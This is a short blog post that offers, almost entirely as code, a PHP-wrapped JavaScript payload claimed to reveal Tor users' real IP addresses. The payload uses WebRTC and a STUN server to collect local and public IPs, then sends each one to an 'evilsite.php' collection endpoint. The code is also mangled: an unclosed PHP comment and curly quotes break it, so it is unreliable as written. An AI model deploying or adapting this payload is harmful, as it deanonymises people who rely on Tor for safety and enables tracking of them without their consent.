<!DOCTYPE html> <html> <head> <meta http-equiv=”Content-Type” content=”text/html…

1 min readApr 22, 2022

How to bypass a tor exit node a pull a users ip

<!DOCTYPE html>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8">
</head>
<body>

<?php
error_reporting(0);
set_time_limit(0);
ini_set(‘display_errors’, 0);
ini_set(‘max_execution_time’, 0);

/*
$exploit = “
<script type=’text/javascript’>
httpGet(‘http://localhost/evilsite.php?IP=[ IP START ]’) // Obtaining tor users home ip bypassing exit node
//get the IP addresses associated with an account

var ip2 = ‘’;
function getIPs(callback) {
var ip_dups = {};

//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};

//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{‘url’: ‘stun:stun.services.mozilla.com’}]
var servers = undefined;

//add same stun server for chrome
if (window.webkitRTCPeerConnection)
servers = {iceServers: [{urls: ‘stun:stun.services.mozilla.com’}]};

//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);

//listen for candidate events
pc.onicecandidate = function(ice) {

//skip non-candidate events
if (ice.candidate) {

//match just the IP address
var ip_regex = /([0–9]{1,3}(\.[0–9]{1,3}){3})/;
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

//remove duplicates
if (ip_dups[ip_addr] === undefined)
callback(ip_addr);

ip_dups[ip_addr] = true;
}
};

//create a bogus data channel
pc.createDataChannel(‘’);

//create an offer sdp
pc.createOffer(function(result) {

//trigger the stun server request
pc.setLocalDescription(result, function() {
}, function() {
});

}, function() {
});
}

//insert IP addresses into the page
getIPs(function(ip) {
envior(ip); //SUB PROCESSO
}
);

//ENVIO GET
function httpGet(url)
{
var xmlHttp = null;

xmlHttp = new XMLHttpRequest();
xmlHttp.open(‘GET’, url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}

function envior(valor) {
ip2 = ‘ — ‘ + valor.toString();
document.write(httpGet(‘http://localhost/evilsite.php?IP=’ + ip2));

//Tor will never be the same
//We out here cuz
}
</script>”;

echo $exploit;

Written by Sleep

No responses yet